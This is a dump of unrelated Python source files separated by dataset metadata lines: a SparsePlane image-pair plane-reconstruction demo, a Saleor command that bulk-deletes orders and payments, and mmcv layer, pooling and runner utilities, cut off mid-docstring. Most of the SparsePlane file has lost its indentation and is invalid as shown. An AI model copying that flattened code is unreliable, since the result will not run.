from sparseplane.utils.vis import get_single_image_mesh_plane
from sparseplane.visualization import create_instances, get_labeled_seg, draw_match
import KMSolver
from local_refinement_sift import (
get_pixel_matching,
vec6dToSo3,
rotation_matrix_from_array,
so3ToVec6d,
fun_with_precalculated_sift_reduce_rot,
)
def km_solver(distance_matrix, weight):
"""
    km: Hungarian (Kuhn-Munkres) assignment.
    If a pair's distance exceeds the threshold, the match is rejected even if
    it is the smallest entry in its row/column.
"""
    cost_matrix = (distance_matrix.numpy() * 1000).astype(int)
prediction_matrix_km = KMSolver.solve(
cost_matrix, threshold=int((1 - weight["threshold"]) * 1000)
)
return prediction_matrix_km
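# Usage sketch (illustrative only; KMSolver is a project-local extension, so
# its exact return format is defined by its own sources): with the default
# threshold of 0.7, only pairs whose distance is below 0.7 can be matched, so
# for the matrix below the expected assignment is 0-0 and 1-1.
# assignment = km_solver(torch.tensor([[0.1, 0.9], [0.8, 0.2]]),
#                        weight={"threshold": 0.7})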
class PlaneRCNN_Branch:
def __init__(self, cfg, cpu_device="cpu"):
self.predictor = DefaultPredictor(cfg)
self._cpu_device = cpu_device
self._K_inv_dot_xy_1 = torch.FloatTensor(self.get_K_inv_dot_xy_1()).to("cuda")
self._camera_on = cfg.MODEL.CAMERA_ON
self._embedding_on = cfg.MODEL.EMBEDDING_ON
self.img_format = cfg.INPUT.FORMAT
def inference(
self,
img_file1,
img_file2,
):
"""
input: im0, im1 path.
"""
im0 = utils.read_image(img_file1, format=self.img_format)
im1 = utils.read_image(img_file2, format=self.img_format)
# Equivalent
# im0 = cv2.imread(img_file1)
# im1 = cv2.imread(img_file2)
im0 = cv2.resize(im0, (640, 480))
im1 = cv2.resize(im1, (640, 480))
im0 = torch.as_tensor(im0.transpose(2, 0, 1).astype("float32"))
im1 = torch.as_tensor(im1.transpose(2, 0, 1).astype("float32"))
with torch.no_grad():
pred = self.predictor.model([{"0": {"image": im0}, "1": {"image": im1}}])[0]
return pred
def process(self, output):
prediction = {"0": {}, "1": {}}
tmp_instances = {"0": {}, "1": {}}
for i in range(2):
if "instances" in output[str(i)]:
instances = output[str(i)]["instances"].to(self._cpu_device)
prediction[str(i)]["instances"] = instances_to_coco_json(
instances, "demo"
)
prediction[str(i)]["pred_plane"] = output[str(i)][
"instances"
].pred_plane.to(self._cpu_device)
tmp_instances[str(i)]["embeddingbox"] = {
"pred_boxes": instances.pred_boxes,
"scores": instances.scores,
}
if "proposals" in output[str(i)]:
prediction[str(i)]["proposals"] = output[str(i)]["proposals"].to(
self._cpu_device
)
if output["depth"][str(i)] is not None:
prediction[str(i)]["pred_depth"] = output["depth"][str(i)].to(
self._cpu_device
)
xyz = self.depth2XYZ(output["depth"][str(i)])
prediction[str(i)] = self.override_depth(xyz, prediction[str(i)])
if self._embedding_on:
if "pred_aff" in output:
tmp_instances["pred_aff"] = output["pred_aff"].to(self._cpu_device)
if "geo_aff" in output:
tmp_instances["geo_aff"] = output["geo_aff"].to(self._cpu_device)
if "emb_aff" in output:
tmp_instances["emb_aff"] = output["emb_aff"].to(self._cpu_device)
prediction["corrs"] = tmp_instances
if self._camera_on:
camera_dict = {
"logits": {
"tran": output["camera"]["tran"].to(self._cpu_device),
"rot": output["camera"]["rot"].to(self._cpu_device),
},
"logits_sms": {
"tran": softmax(output["camera"]["tran"].to(self._cpu_device)),
"rot": softmax(output["camera"]["rot"].to(self._cpu_device)),
},
}
prediction["camera"] = camera_dict
return prediction
def depth2XYZ(self, depth):
"""
Convert depth to point clouds
X - width
Y - depth
Z - height
"""
XYZ = self._K_inv_dot_xy_1 * depth
return XYZ
@staticmethod
def get_K_inv_dot_xy_1(h=480, w=640):
focal_length = 517.97
offset_x = 320
offset_y = 240
K = [[focal_length, 0, offset_x], [0, focal_length, offset_y], [0, 0, 1]]
K_inv = np.linalg.inv(np.array(K))
K_inv_dot_xy_1 = np.zeros((3, h, w))
for y in range(h):
for x in range(w):
yy = float(y) / h * 480
xx = float(x) / w * 640
ray = np.dot(K_inv, np.array([xx, yy, 1]).reshape(3, 1))
K_inv_dot_xy_1[:, y, x] = ray[:, 0]
return K_inv_dot_xy_1.reshape(3, h, w)
@staticmethod
def override_depth(xyz, instance):
pred_masks = [p["segmentation"] for p in instance["instances"]]
override_list = []
for mask, plane in zip(pred_masks, instance["pred_plane"]):
bimask = mask_util.decode(mask)
if bimask.sum() == 0:
override_list.append(plane)
continue
xyz_tmp = xyz[:, torch.BoolTensor(bimask)]
offset = np.linalg.norm(plane)
normal = plane / max(offset, 1e-8)
offset_new = (normal @ xyz_tmp.cpu().numpy()).mean()
override_list.append(normal * offset_new)
if len(override_list) > 0:
instance["pred_plane"] = torch.stack(override_list)
return instance
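def _example_backprojection():
    """Illustrative sketch, not part of the original repo.

    Demonstrates the pinhole back-projection used by depth2XYZ without
    constructing the full predictor: XYZ[:, y, x] = depth[y, x] * K^-1 [x, y, 1]^T.
    """
    K_inv_dot_xy_1 = torch.FloatTensor(PlaneRCNN_Branch.get_K_inv_dot_xy_1())
    depth = torch.ones(1, 480, 640)  # dummy 1-meter depth map
    xyz = K_inv_dot_xy_1 * depth     # (3, 480, 640) point cloud in the camera frame
    return xyz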
class Camera_Branch:
def __init__(self, d2_cfg):
self.cfg = d2_cfg
if self.cfg.MODEL.CAMERA_ON:
with open(self.cfg.MODEL.CAMERA_HEAD.KMEANS_TRANS_PATH, "rb") as f:
self.kmeans_trans = pickle.load(f)
with open(self.cfg.MODEL.CAMERA_HEAD.KMEANS_ROTS_PATH, "rb") as f:
self.kmeans_rots = pickle.load(f)
def xyz2class(self, x, y, z):
return self.kmeans_trans.predict([[x, y, z]])
def quat2class(self, w, xi, yi, zi):
return self.kmeans_rots.predict([[w, xi, yi, zi]])
def class2xyz(self, cls):
assert (cls >= 0).all() and (cls < self.kmeans_trans.n_clusters).all()
return self.kmeans_trans.cluster_centers_[cls]
def class2quat(self, cls):
assert (cls >= 0).all() and (cls < self.kmeans_rots.n_clusters).all()
return self.kmeans_rots.cluster_centers_[cls]
def get_rel_camera(self, pred_dict, tran_topk=0, rot_topk=0):
sorted_idx_tran = np.argsort(pred_dict["camera"]["logits"]["tran"].numpy())[
::-1
]
sorted_idx_rot = np.argsort(pred_dict["camera"]["logits"]["rot"].numpy())[::-1]
tran = self.class2xyz(sorted_idx_tran[tran_topk])
rot = self.class2quat(sorted_idx_rot[rot_topk])
if "logits_sms" in pred_dict["camera"].keys():
tran_p = pred_dict["camera"]["logits_sms"]["tran"][sorted_idx_tran[tran_topk]]
rot_p = pred_dict["camera"]["logits_sms"]["rot"][sorted_idx_rot[rot_topk]]
else:
tran_p = softmax(pred_dict["camera"]['logits']["tran"])[sorted_idx_tran[tran_topk]]
rot_p = softmax(pred_dict["camera"]['logits']["rot"])[sorted_idx_rot[rot_topk]]
camera_info = {
"position": tran,
"position_prob": tran_p,
"rotation": rot,
"rotation_prob": rot_p,
}
return camera_info
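def _example_camera_binning():
    """Illustrative sketch, not part of the original repo.

    Camera_Branch maps continuous poses to k-means bins and back via the
    pickled cluster models. The snippet below mimics xyz2class / class2xyz
    with a small scikit-learn KMeans fitted on random data (an assumption;
    the shipped pickles are pre-trained on the dataset's camera poses).
    """
    from sklearn.cluster import KMeans

    kmeans = KMeans(n_clusters=4, n_init=10).fit(np.random.rand(100, 3))
    cls = kmeans.predict([[0.2, 0.1, 0.5]])    # xyz -> bin, cf. xyz2class
    xyz = kmeans.cluster_centers_[cls]         # bin -> xyz, cf. class2xyz
    return cls, xyz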
class Discrete_Optimizer:
def __init__(self, cfg):
self.weight = {
"threshold": 0.7,
"lambda_emb": 0.47,
"lambda_geo_l2": 0.00,
"l2_clamp": 5,
"lambda_geo_normal": 0.25,
"lambda_geo_offset": 0.28,
"offset_clamp": 4,
"topk_tran": 32,
"topk_rot": 32,
# [assignment.sum(), pred_cam['position_prob'], pred_cam['rotation_prob'], (embedding_matrix*assignment).numpy().mean(),
# (l2_matrix*assignment).numpy().mean(), (normal_matrix*assignment).numpy().mean(), (offset_matrix*assignment).numpy().mean(),
# [assignment.sum(), log(pcam_tran), log(pcam_rot), distance*assignment]
"score_weight": [0.311, 0.166, 0.092, -0.432],
"assignment": "km_search_cam",
}
# Initialize camera
self.camera_branch = Camera_Branch(d2_cfg=cfg)
# class for geometric distance
self.geo_consistency_loss = GeoConsistencyLoss("cpu")
def optimize(self, pred_dict):
embedding_matrix = 1 - pred_dict["corrs"]["pred_aff"]
weight = self.weight
# discrete optimization
        best_score = -np.inf  # np.NINF was removed in NumPy 2.0
best_assignment = None
best_camera = None
best_tran_topk = None
best_rot_topk = None
best_distance_m = None
score_weight = np.array(weight["score_weight"]).reshape(-1, 1)
for k_tran in range(weight["topk_tran"]):
for k_rot in range(weight["topk_rot"]):
pred_cam = self.camera_branch.get_rel_camera(pred_dict, k_tran, k_rot)
geo_matrix = defaultdict(dict)
# l2
(
geo_distance_matrix,
numPlanes1,
numPlanes2,
) = self.geo_consistency_loss.inference(
[pred_dict["0"]], [pred_dict["1"]], [pred_cam], distance="l2"
)
geo_matrix.update(geo_distance_matrix)
# normal angle
(
normal_angle_matrix,
numPlanes1,
numPlanes2,
) = self.geo_consistency_loss.inference(
[pred_dict["0"]], [pred_dict["1"]], [pred_cam], distance="normal"
)
geo_matrix.update(normal_angle_matrix)
l2_matrix = (
np.clip(geo_matrix["l2"], 0, weight["l2_clamp"])
/ weight["l2_clamp"]
)
normal_matrix = geo_matrix["normal"] / np.pi
offset_matrix = (
np.clip(geo_matrix["offset"], 0, weight["offset_clamp"])
/ weight["offset_clamp"]
)
distance_matrix = (
weight["lambda_emb"] * embedding_matrix
+ weight["lambda_geo_l2"] * l2_matrix
+ weight["lambda_geo_normal"] * normal_matrix
+ weight["lambda_geo_offset"] * offset_matrix
)
assignment = km_solver(distance_matrix[0], weight=weight)
x = np.array(
[
assignment.sum(),
np.log(pred_cam["position_prob"]),
np.log(pred_cam["rotation_prob"]),
(distance_matrix * assignment).numpy().mean(),
]
)
score = x @ score_weight
if score > best_score:
best_score = score
best_assignment = assignment
best_distance_m = distance_matrix
best_camera = pred_cam
best_tran_topk = k_tran
best_rot_topk = k_rot
return {
"best_camera": best_camera,
"best_assignment": best_assignment,
"distance_m": best_distance_m,
"best_tran_topk": best_tran_topk,
"best_rot_topk": best_rot_topk,
}
class Continuous_Optimizer:
def __init__(self):
self.weight = {
"huber_delta": 0.01,
"lambda_R": 1.0,
}
def optimize(self, img_file1, img_file2, pred_dict, optimized_dict):
"""
Initialize camera pose
"""
init_R = optimized_dict["best_camera"]["rotation"]
init_T = optimized_dict["best_camera"]["position"]
x0 = np.concatenate((so3ToVec6d(rotation_matrix_from_array(init_R)), init_T))
"""
Select correspondence assignment
"""
assignment_m = optimized_dict["best_assignment"]
assignment = np.argwhere(assignment_m)
"""
Select plane params
"""
x1_full = np.array(pred_dict["0"]["pred_plane"])
x2_full = np.array(pred_dict["1"]["pred_plane"])
if len(assignment) == 0:
rtn = {
"n_corr": len(assignment),
"cost": 0,
"best_camera": {"position": init_T, "rotation": init_R},
"best_assignment": assignment_m,
"plane_param_override": {"0": x1_full, "1": x2_full},
}
return rtn
x1 = x1_full[assignment[:, 0]]
x2 = x2_full[assignment[:, 1]]
"""
Select optimized function
"""
boxes1 = np.array([inst["bbox"] for inst in pred_dict["0"]["instances"]])[
assignment[:, 0]
]
boxes2 = np.array([inst["bbox"] for inst in pred_dict["1"]["instances"]])[
assignment[:, 1]
]
segms1 = np.array(
[inst["segmentation"] for inst in pred_dict["0"]["instances"]]
)[assignment[:, 0]]
segms2 = np.array(
[inst["segmentation"] for inst in pred_dict["1"]["instances"]]
)[assignment[:, 1]]
offsets1 = np.linalg.norm(x1, axis=1)
normals1 = x1 / (offsets1.reshape(-1, 1) + 1e-5)
offsets2 = np.linalg.norm(x2, axis=1)
normals2 = x2 / (offsets2.reshape(-1, 1) + 1e-5)
x0 = np.concatenate((x0, offsets1, offsets2))
img1 = cv2.imread(img_file1, cv2.IMREAD_COLOR)[:, :, ::-1]
img2 = cv2.imread(img_file2, cv2.IMREAD_COLOR)[:, :, ::-1]
img1 = cv2.resize(img1, (640, 480))
img2 = cv2.resize(img2, (640, 480))
xys1, xys2 = [], []
for i in range(len(boxes1)):
try:
xy1, xy2 = get_pixel_matching(
img1, boxes1[i], segms1[i], x1[i], img2, boxes2[i], segms2[i], x2[i]
)
            except Exception:
                # SIFT pixel matching may fail (e.g. too few keypoints); fall back to empty matches
                xy1 = []
                xy2 = []
xys1.append(np.array(xy1))
xys2.append(np.array(xy2))
rst = least_squares(
fun_with_precalculated_sift_reduce_rot,
x0,
args=(
len(boxes1),
img1,
xys1,
normals1,
img2,
xys2,
normals2,
rotation_matrix_from_array(init_R),
self.weight,
),
)
offsets1 = rst.x[9 : 9 + len(boxes1)]
offsets2 = rst.x[9 + len(boxes1) : 9 + len(boxes1) * 2]
x1_full[assignment[:, 0]] = offsets1.reshape(-1, 1) * normals1
x2_full[assignment[:, 1]] = offsets2.reshape(-1, 1) * normals2
pred_R = quaternion.as_float_array(
quaternion.from_rotation_matrix(vec6dToSo3(rst.x[:6]))
)
pred_T = rst.x[6:9]
rtn = {
"n_corr": len(assignment),
"cost": rst.cost,
"best_camera": {"position": pred_T, "rotation": pred_R},
"best_assignment": assignment_m,
"plane_param_override": {"0": x1_full, "1": x2_full},
}
return rtn
def save_matching(
img_file1,
img_file2,
pred_dict,
assignment,
output_dir,
prefix="",
paper_img=False,
score_threshold=0.7,
):
"""
fp: whether show fp or fn
gt_box: whether use gtbox
"""
image_paths = {"0": img_file1, "1": img_file2}
blended = {}
# centroids for matching
centroids = {"0": [], "1": []}
for i in range(2):
img = cv2.imread(image_paths[str(i)], cv2.IMREAD_COLOR)[:, :, ::-1]
img = cv2.resize(img, (640, 480))
height, width, _ = img.shape
vis = Visualizer(img)
p_instance = create_instances(
pred_dict[str(i)]["instances"],
img.shape[:2],
pred_planes=pred_dict[str(i)]["pred_plane"].numpy(),
conf_threshold=score_threshold,
)
seg_blended = get_labeled_seg(
p_instance, score_threshold, vis, paper_img=paper_img
)
blended[str(i)] = seg_blended
# centroid of mask
for ann in pred_dict[str(i)]["instances"]:
M = center_of_mass(mask_util.decode(ann["segmentation"]))
centroids[str(i)].append(M[::-1]) # reverse for opencv
centroids[str(i)] = np.array(centroids[str(i)])
pred_corr_list = np.array(torch.FloatTensor(assignment).nonzero().tolist())
correct_list_pred = [True for pair in pred_corr_list]
pred_matching_fig = draw_match(
blended["0"],
blended["1"],
centroids["0"],
centroids["1"],
np.array(pred_corr_list),
correct_list_pred,
vertical=False,
)
os.makedirs(output_dir, exist_ok=True)
pred_matching_fig.save(os.path.join(output_dir, prefix + ".png"))
def merge_plane_params_from_local_params(plane_locals, corr_list, camera_pose):
"""
input: plane parameters in camera frame
output: merged plane parameters using corr_list
"""
param1, param2 = plane_locals["0"], plane_locals["1"]
param1_global = get_plane_params_in_global(param1, camera_pose)
param2_global = get_plane_params_in_global(
param2, {"position": np.array([0, 0, 0]), "rotation": np.quaternion(1, 0, 0, 0)}
)
param1_global, param2_global = merge_plane_params_from_global_params(
param1_global, param2_global, corr_list
)
param1 = get_plane_params_in_local(param1_global, camera_pose)
param2 = get_plane_params_in_local(
param2_global,
{"position": np.array([0, 0, 0]), "rotation": np.quaternion(1, 0, 0, 0)},
)
return {"0": param1, "1": param2}
def merge_plane_params_from_global_params(param1, param2, corr_list):
"""
input: plane parameters in global frame
output: merged plane parameters using corr_list
"""
pred = {"0": {}, "1": {}}
pred["0"]["offset"] = np.maximum(
np.linalg.norm(param1, ord=2, axis=1), 1e-5
).reshape(-1, 1)
pred["0"]["normal"] = param1 / pred["0"]["offset"]
pred["1"]["offset"] = np.maximum(
np.linalg.norm(param2, ord=2, axis=1), 1e-5
).reshape(-1, 1)
pred["1"]["normal"] = param2 / pred["1"]["offset"]
for ann_id in corr_list:
# average normal
normal_pair = np.vstack(
(pred["0"]["normal"][ann_id[0]], pred["1"]["normal"][ann_id[1]])
)
w, v = eigh(normal_pair.T @ normal_pair)
avg_normals = v[:, np.argmax(w)]
if (avg_normals @ normal_pair.T).sum() < 0:
avg_normals = -avg_normals
# average offset
avg_offset = (
pred["0"]["offset"][ann_id[0]] + pred["1"]["offset"][ann_id[1]]
) / 2
avg_plane = avg_normals * avg_offset
param1[ann_id[0]] = avg_plane
param2[ann_id[1]] = avg_plane
return param1, param2
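def _example_average_normals():
    """Illustrative sketch, not part of the original repo.

    merge_plane_params_from_global_params averages two plane normals as the
    dominant eigenvector of normal_pair.T @ normal_pair; for two identical
    normals this simply returns that normal (up to sign).
    """
    normal_pair = np.array([[0.0, 0.0, 1.0], [0.0, 0.0, 1.0]])
    w, v = eigh(normal_pair.T @ normal_pair)
    avg = v[:, np.argmax(w)]
    if (avg @ normal_pair.T).sum() < 0:
        avg = -avg
    # avg is (close to) [0, 0, 1]
    return avg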
def save_pair_objects(
img_file1,
img_file2,
p_instances,
output_dir,
prefix="",
pred_camera=None,
plane_param_override=None,
show_camera=True,
corr_list=[],
webvis=False,
):
"""
if tran_topk == -2 and rot_topk == -2, then pred_camera should not be None, this is used for non-binned camera.
if exclude is not None, exclude some instances to make fig 2.
idx=7867
exclude = {
'0': [2,3,4,5,6,7],
'1': [0,1,2,4,5,6,7],
}
"""
image_paths = {"0": img_file1, "1": img_file2}
meshes_list = []
# map_files = []
uv_maps = []
cam_list = []
# get plane parameters
plane_locals = {}
for i in range(2):
if plane_param_override is None:
plane_locals[str(i)] = p_instances[str(i)].pred_planes
else:
plane_locals[str(i)] = plane_param_override[str(i)]
# get camera 1 to 2
camera1to2 = {
"position": np.array(pred_camera["position"]),
"rotation": quaternion.from_float_array(pred_camera["rotation"]),
}
# Merge planes if they are in correspondence
if len(corr_list) != 0:
plane_locals = merge_plane_params_from_local_params(
plane_locals, corr_list, camera1to2
)
os.makedirs(output_dir, exist_ok=True)
for i in range(2):
if i == 0:
camera_info = camera1to2
else:
camera_info = {
"position": np.array([0, 0, 0]),
"rotation": np.quaternion(1, 0, 0, 0),
}
p_instance = p_instances[str(i)]
plane_params = plane_locals[str(i)]
segmentations = p_instance.pred_masks
meshes, uv_map = get_single_image_mesh_plane(
plane_params,
segmentations,
img_file=image_paths[str(i)],
height=480,
width=640,
webvis=False,
)
uv_maps.extend(uv_map)
meshes = transform_meshes(meshes, camera_info)
meshes_list.append(meshes)
cam_list.append(camera_info)
joint_mesh = join_meshes_as_batch(meshes_list)
if webvis:
joint_mesh = rotate_mesh_for_webview(joint_mesh)
# add camera into the mesh
if show_camera:
cam_meshes = get_camera_meshes(cam_list)
if webvis:
cam_meshes = rotate_mesh_for_webview(cam_meshes)
else:
cam_meshes = None
# save obj
if len(prefix) == 0:
prefix = "pred"
save_obj(
folder=output_dir,
prefix=prefix,
meshes=joint_mesh,
cam_meshes=cam_meshes,
decimal_places=10,
blend_flag=True,
map_files=None,
uv_maps=uv_maps,
)
def get_parser():
parser = argparse.ArgumentParser(description="SparsePlane Demo")
parser.add_argument(
"--config-file",
default="./tools/demo/config.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--input",
default="./tools/demo/teaser",
help="A path to a folder of input images",
)
parser.add_argument(
"--img-list", default=None, help="A path to a text file for inference"
)
parser.add_argument(
"--output", default="./debug", help="A directory to save output visualizations"
)
return parser
def inference_pair(output_dir, model, dis_opt, con_opt, im0, im1):
"""
Network inference on a single pair of images.
"""
pred = model.inference(im0, im1)
pred_dict = model.process(pred)
# save segmentation only
image_paths = {"0": im0, "1": im1}
p_instances = {}
for i in range(2):
img = cv2.imread(image_paths[str(i)], cv2.IMREAD_COLOR)
img = cv2.resize(img, (640, 480))
vis = Visualizer(img)
p_instance = create_instances(
pred_dict[str(i)]["instances"],
img.shape[:2],
pred_planes=pred_dict[str(i)]["pred_plane"].numpy(),
conf_threshold=0.7,
)
p_instances[str(i)] = p_instance
seg_blended = get_labeled_seg(p_instance, 0.7, vis, paper_img=True)
os.makedirs(os.path.join(output_dir), exist_ok=True)
cv2.imwrite(os.path.join(output_dir, f"view{i}_pred.jpg"), seg_blended)
cv2.imwrite(os.path.join(output_dir, f"view{i}.jpg"), img)
# Optimize
optimized_dict = dis_opt.optimize(pred_dict)
optimized_dict = con_opt.optimize(im0, im1, pred_dict, optimized_dict)
# visualize
save_matching(
im0,
im1,
pred_dict,
optimized_dict["best_assignment"],
output_dir,
prefix="corr",
paper_img=True,
)
# save original image (resized)
cv2.imwrite(
os.path.join(output_dir, "view0.jpg"), cv2.resize(cv2.imread(im0), (640, 480))
)
cv2.imwrite(
os.path.join(output_dir, "view1.jpg"), cv2.resize(cv2.imread(im1), (640, 480))
)
# save obj
save_pair_objects(
os.path.join(output_dir, "view0.jpg"),
os.path.join(output_dir, "view1.jpg"),
p_instances,
os.path.join(output_dir),
prefix="refined",
pred_camera=optimized_dict["best_camera"],
plane_param_override=optimized_dict["plane_param_override"],
show_camera=True,
corr_list=np.argwhere(optimized_dict["best_assignment"]),
webvis=True,
)
def main():
args = get_parser().parse_args()
# Load cfg
cfg = get_cfg()
get_sparseplane_cfg_defaults(cfg)
cfg.merge_from_file(args.config_file)
# Initialize network
model = PlaneRCNN_Branch(cfg)
# Initialize optimizer
dis_opt = Discrete_Optimizer(cfg)
con_opt = Continuous_Optimizer()
if args.img_list: # a text file
f = open(args.img_list)
lines = f.readlines()
f.close()
for line_idx, line in enumerate(tqdm(lines)):
output_dir = os.path.join(args.output, "{:0>4}".format(line_idx))
os.makedirs(output_dir, exist_ok=True)
line = line.strip()
splits = line.split(" ")
im0 = os.path.join(args.input, splits[0])
im1 = os.path.join(args.input, splits[1])
inference_pair(output_dir, model, dis_opt, con_opt, im0, im1)
else: # a directory
input_dir = args.input
output_dir = args.output
im0 = os.path.join(input_dir, "view_0.png")
im1 = os.path.join(input_dir, "view_1.png")
inference_pair(output_dir, model, dis_opt, con_opt, im0, im1)
if __name__ == "__main__":
main()
``` |
{
"source": "Jin-LiuGit/Python_ECommerece",
"score": 2
} |
#### File: management/commands/cleardata.py
```python
from django.core.management.base import BaseCommand
from saleor.order.models import Order, Fulfillment
from saleor.payment.models import Payment, Transaction
from saleor.checkout.models import Checkout
class Command(BaseCommand):
help = "Populate database with test objects"
def add_arguments(self, parser):
parser.add_argument(
"--orders",
action="store_true",
dest="orders",
default=False,
help="Delete orders",
)
def handle(self, *args, **options):
self.stdout.write("Delete objects")
if options["orders"]:
Transaction.objects.all().delete()
Payment.objects.all().delete()
Fulfillment.objects.all().delete()
Checkout.objects.all().delete()
Order.objects.all().delete()
``` |
{
"source": "jinliwei1997/mmcv",
"score": 2
} |
#### File: cnn/bricks/padding.py
```python
import torch.nn as nn
from .registry import PADDING_LAYERS
PADDING_LAYERS.register_module('zero', module=nn.ZeroPad2d)
PADDING_LAYERS.register_module('reflect', module=nn.ReflectionPad2d)
PADDING_LAYERS.register_module('replicate', module=nn.ReplicationPad2d)
def build_padding_layer(cfg, *args, **kwargs):
"""Build padding layer.
Args:
        cfg (dict): The padding layer config, which should contain:
- type (str): Layer type.
- layer args: Args needed to instantiate a padding layer.
Returns:
nn.Module: Created padding layer.
"""
if not isinstance(cfg, dict):
raise TypeError('cfg must be a dict')
if 'type' not in cfg:
raise KeyError('the cfg dict must contain the key "type"')
cfg_ = cfg.copy()
padding_type = cfg_.pop('type')
if padding_type not in PADDING_LAYERS:
raise KeyError(f'Unrecognized padding type {padding_type}.')
else:
padding_layer = PADDING_LAYERS.get(padding_type)
layer = padding_layer(*args, **kwargs, **cfg_)
return layer
```
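A short usage sketch for `build_padding_layer` (illustrative; it assumes the function is also re-exported as `mmcv.cnn.build_padding_layer`, its usual public location):
```python
import torch
from mmcv.cnn import build_padding_layer

# 'reflect' resolves to nn.ReflectionPad2d through the PADDING_LAYERS registry.
pad = build_padding_layer(dict(type='reflect'), 1)
x = torch.rand(1, 3, 8, 8)
print(pad(x).shape)  # torch.Size([1, 3, 10, 10])
```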
#### File: mmcv/ops/corner_pool.py
```python
import torch
from torch import nn
from torch.autograd import Function
from ..utils import ext_loader
ext_module = ext_loader.load_ext('_ext', [
'top_pool_forward', 'top_pool_backward', 'bottom_pool_forward',
'bottom_pool_backward', 'left_pool_forward', 'left_pool_backward',
'right_pool_forward', 'right_pool_backward'
])
class TopPoolFunction(Function):
@staticmethod
def forward(ctx, input):
output = ext_module.top_pool_forward(input)
ctx.save_for_backward(input)
return output
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
output = ext_module.top_pool_backward(input, grad_output)
return output
class BottomPoolFunction(Function):
@staticmethod
def forward(ctx, input):
output = ext_module.bottom_pool_forward(input)
ctx.save_for_backward(input)
return output
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
output = ext_module.bottom_pool_backward(input, grad_output)
return output
class LeftPoolFunction(Function):
@staticmethod
def forward(ctx, input):
output = ext_module.left_pool_forward(input)
ctx.save_for_backward(input)
return output
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
output = ext_module.left_pool_backward(input, grad_output)
return output
class RightPoolFunction(Function):
@staticmethod
def forward(ctx, input):
output = ext_module.right_pool_forward(input)
ctx.save_for_backward(input)
return output
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
output = ext_module.right_pool_backward(input, grad_output)
return output
class CornerPool(nn.Module):
"""Corner Pooling.
Corner Pooling is a new type of pooling layer that helps a
convolutional network better localize corners of bounding boxes.
Please refer to https://arxiv.org/abs/1808.01244 for more details.
Code is modified from https://github.com/princeton-vl/CornerNet-Lite.
Args:
mode(str): Pooling orientation for the pooling layer
- 'bottom': Bottom Pooling
- 'left': Left Pooling
- 'right': Right Pooling
- 'top': Top Pooling
Returns:
Feature map after pooling.
"""
pool_functions = {
'bottom': BottomPoolFunction,
'left': LeftPoolFunction,
'right': RightPoolFunction,
'top': TopPoolFunction,
}
cummax_dim_flip = {
'bottom': (2, False),
'left': (3, True),
'right': (3, False),
'top': (2, True),
}
def __init__(self, mode):
super(CornerPool, self).__init__()
assert mode in self.pool_functions
self.mode = mode
self.corner_pool = self.pool_functions[mode]
def forward(self, x):
        # NOTE: lexicographic version comparison is fragile (e.g. '1.10.0' < '1.5.0');
        # later mmcv versions use digit_version() for this check.
        if torch.__version__ != 'parrots' and torch.__version__ >= '1.5.0':
dim, flip = self.cummax_dim_flip[self.mode]
if flip:
x = x.flip(dim)
pool_tensor, _ = torch.cummax(x, dim=dim)
if flip:
pool_tensor = pool_tensor.flip(dim)
return pool_tensor
else:
return self.corner_pool.apply(x)
```
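A short usage sketch for `CornerPool` (illustrative; with PyTorch >= 1.5 the `cummax` branch above runs on CPU, otherwise the compiled extension kernels are required):
```python
import torch
from mmcv.ops import CornerPool

pool = CornerPool('top')         # propagates maxima along the height dimension
x = torch.rand(2, 8, 16, 16)
y = pool(x)
assert y.shape == x.shape
```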
#### File: runner/hooks/sampler_seed.py
```python
from .hook import HOOKS, Hook
@HOOKS.register_module()
class DistSamplerSeedHook(Hook):
def before_epoch(self, runner):
if hasattr(runner.data_loader.sampler, 'set_epoch'):
# in case the data loader uses `SequentialSampler` in Pytorch
runner.data_loader.sampler.set_epoch(runner.epoch)
elif hasattr(runner.data_loader.batch_sampler.sampler, 'set_epoch'):
# batch sampler in pytorch warps the sampler as its attributes.
runner.data_loader.batch_sampler.sampler.set_epoch(runner.epoch)
```
#### File: mmcv/runner/utils.py
```python
import os
import random
import sys
import time
from getpass import getuser
from socket import gethostname
import numpy as np
import torch
import mmcv
def get_host_info():
return f'{getuser()}@{gethostname()}'
def get_time_str():
return time.strftime('%Y%m%d_%H%M%S', time.localtime())
def obj_from_dict(info, parent=None, default_args=None):
"""Initialize an object from dict.
The dict must contain the key "type", which indicates the object type, it
can be either a string or type, such as "list" or ``list``. Remaining
fields are treated as the arguments for constructing the object.
Args:
info (dict): Object types and arguments.
        parent (:class:`module`): Module which may contain the expected object
            classes.
default_args (dict, optional): Default arguments for initializing the
object.
Returns:
any type: Object built from the dict.
"""
assert isinstance(info, dict) and 'type' in info
assert isinstance(default_args, dict) or default_args is None
args = info.copy()
obj_type = args.pop('type')
if mmcv.is_str(obj_type):
if parent is not None:
obj_type = getattr(parent, obj_type)
else:
obj_type = sys.modules[obj_type]
elif not isinstance(obj_type, type):
raise TypeError('type must be a str or valid type, but '
f'got {type(obj_type)}')
if default_args is not None:
for name, value in default_args.items():
args.setdefault(name, value)
return obj_type(**args)
def set_random_seed(seed, deterministic=False, use_rank_shift=False):
"""Set random seed.
Args:
seed (int): Seed to be used.
deterministic (bool): Whether to set the deterministic option for
CUDNN backend, i.e., set `torch.backends.cudnn.deterministic`
to True and `torch.backends.cudnn.benchmark` to False.
Default: False.
        use_rank_shift (bool): Whether to add the process rank to the random
            seed so that different ranks use different seeds. Default: False.
"""
if use_rank_shift:
rank, _ = mmcv.runner.get_dist_info()
seed += rank
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
if deterministic:
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
```
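A short usage sketch for `obj_from_dict` (illustrative; it assumes the helper is re-exported as `mmcv.runner.obj_from_dict`, its usual public location):
```python
import torch
import torch.optim as optim
from mmcv.runner import obj_from_dict

model = torch.nn.Linear(2, 2)
# "type" selects optim.SGD; the remaining keys become constructor arguments.
optimizer = obj_from_dict(
    dict(type='SGD', lr=0.01, momentum=0.9),
    parent=optim,
    default_args=dict(params=model.parameters()))
```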
#### File: mmcv/utils/version_utils.py
```python
import os
import subprocess
def digit_version(version_str):
"""Convert a version string into a tuple of integers.
This method is usually used for comparing two versions.
Args:
